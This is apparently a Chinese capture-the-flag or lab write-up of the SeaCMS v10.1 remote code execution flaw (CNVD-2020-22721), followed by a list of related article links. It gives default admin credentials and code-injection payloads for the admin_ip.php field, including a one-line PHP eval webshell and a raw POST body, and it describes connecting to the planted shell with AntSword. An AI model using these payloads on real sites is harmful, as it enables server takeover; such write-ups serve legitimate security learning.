seacms海洋cms漏洞
seacms海洋cms漏洞
- 前言
- 一、seacms 远程命令执行 (CNVD-2020-22721)
- 0x01 漏洞描述
- 0x02 漏洞利用
- 拿shell
- 总结
前言
海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。
一、seacms 远程命令执行 (CNVD-2020-22721)
0x01 漏洞描述
SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台路径:/manager 后台密码:admin:admin
0x02 漏洞利用
(1)首页如下
访问后台路径 /manager
后台密码 admin admin登录
(2)漏洞利用地址
http://118.193.36.37:21056/manager/admin_ip.php
漏洞存在点 ip参数
poc
(1) 允许 ip 处 输入 ";phpinfo();// 点击确认
(2) 访问 http://118.193.36.37:21056/data/admin/ip.php
写入phpinfo() 代码成功
拿shell
(1) 写入一句话木马
";eval($_POST[123]);//
(2) 蚁剑连接
(3) 连接成功
flag-{bmh5fa859d6-d482-47d0-a1da-83a7be9b66e6}
bp 抓包 修改参数 如下
提交参数
v=0&ip=";eval($_POST[9]);//
总结
seacms海洋cms漏洞相关推荐
- php影视管理系统下载,seacms海洋cms影视管理系统 v10.9
seacms海洋影视管理系统简介 海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分 ...
- php影视管理系统下载,GitHub - ganjmeng/SEACMS: 海洋cms 海洋影视管理系统 - 免费开源PHP...
===更新日志=== 更新日期:2020年2月8日 v10.1 新增:百度SEO时间格式标签{playpage:addtime2} 新增:后台首页待处理互动信息提示 新增:网站内容信息统计 新增:评论 ...
- 记一次海洋cms任意代码执行漏洞拿shell(url一句话)
实验环境:海洋CMS6.54(后续版本已该洞已补) 1.后台登录尝试 这个站点是个测试站,站里没什么数据. 进入admin.php,是带验证码的后台登录系统,没有验证码的可以用bp爆破.有验证码的也有 ...
- WEB漏洞之:海洋CMS代码执行(CNVD-2020-22721)
漏洞环境说明: 海洋CMS是一款视频类cms,本次复现海洋cms远程命令执行漏洞 漏洞编号:CNVD-2020-22721 首先登录后台地址为//manager 默认用户名和密码admin. 进入后台 ...
- 原生php开发cms,海洋cms视频内容管理系统v10.3 原生PHP代码+影视管理系统+视频点播系统+开源CMS...
源码类型:php源码 源码版本:20.11.4 最后更新:2020年11月4日19:32:28 源码说明: 海洋影视管理系统(seacms,海洋 cms)是一套专为不同需求的站长而设计的视频点播系统, ...
- 海洋zyapi.php,海洋cms自带资源发布api插件和第三方资源站接入办法说明
===海洋cms自带API资源发布插件说明=== * 资源发布API是指将自己站内资源发布出来,做出资源站,供其他站长采集数据. * 站长可以在后台控制是否开启资源发布API插件. * 资源库API访 ...
- 海洋zyapi.php,zyapi.php · 姬晓亮/海洋cms 海洋影视管理系统 - 免费开源PHP - Gitee.com...
/****************************** 海洋CMS版权所有 www.seacms.org 功能:资源发布zyAPI模块 版本:1.0 开发:海洋 *************** ...
- 最新海洋CMS(海洋视频内容管理系统)V12.6版
正文: 海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯 ...
- 海洋cms新手入门安装配置教程
在安装本系统前,请先确认您的服务器环境是否符合海洋cms环境要求: Windows 平台: IIS/Apache/Nginx + PHP(5.x) + MySQL(5.x) Linux/Unix 平台 ...
- 海洋CMS自动采集教程,小白都会操作
* 针对Liunx,Windows自行扩展. * 无需Python3支持 脚本代码如下: #!/bin/bash ########################################### ...
最新文章
- 一、Focal Loss理论及代码实现
- 定义一个 圆形 Circle类 , 定义其中的长度length属性,定义一个求面积getArea()的方法。 并编写一个测试类,进行长度的赋值和展示,并调用求面积方法展示面积值。
- leetcode 525. Contiguous Array | 525. 连续数组(Java)
- JavaScript总结(3)
- sprintf用法详解
- 高效pycharm使用技巧_您是否正在使用这种高效的采访技巧?
- 猜算式,四个两位数字不可以重复
- 关键字nullable,nonnull,null_resettable,_Null_unspecified详解
- mysql 几何对象,几何(geometry)对象类型
- web在session设置的账户用户名显示为空_海蜘蛛路由Web认证怎么设置 海蜘蛛路由Web认证方法【介绍】...
- 限时!字节Java程序性能优化宝典开源,原来这才叫性能优化
- 60、在Visual Studio 2019 环境下,使用C#调用C++生成的dll实现yolov5的图片检测
- 经颅磁刺激对大脑结构的直接影响: cTBS后的短期神经可塑性
- 关于HP M125-M126的无线链接方案
- java金额大小写转换 数字大小写转换
- Thingworx自定义扩展开发(二)- Widget Demo Coding
- Scratch软件编程等级考试四级——20210320
- HTML5原生WebGL开发系列教程
- 前端disable和readonly的区别?
- 不同系统之间数据对接方式
热门文章
- AUTOSAR接口类型及访问规则
- STM32学习(一)—STM32固件库的使用
- BUUCTF WEB PIAPIAPIA1
- python爬虫岗位招聘_Python爬虫系列2-抓取拉钩网2020年最新互联网岗位招聘信息
- 主图指标,原创极强黄点,将军柱和黄金柱都是3日的
- 01-css3动画之过渡详解 以及 实战纯css打造手风琴图片特效
- 《数字化决策》连载 | 七:探索并建立决策模型(3)
- 搞定签到码,一切皆可码!!!微信小程序篇
- 模仿6ecc 主页 主体部分(查看附件点击6eccHTML 就会看到如下页面效果)
- 闲置电脑挂机赚钱-Traffmonetizer,支持windows,linux,Android,MacOS多平台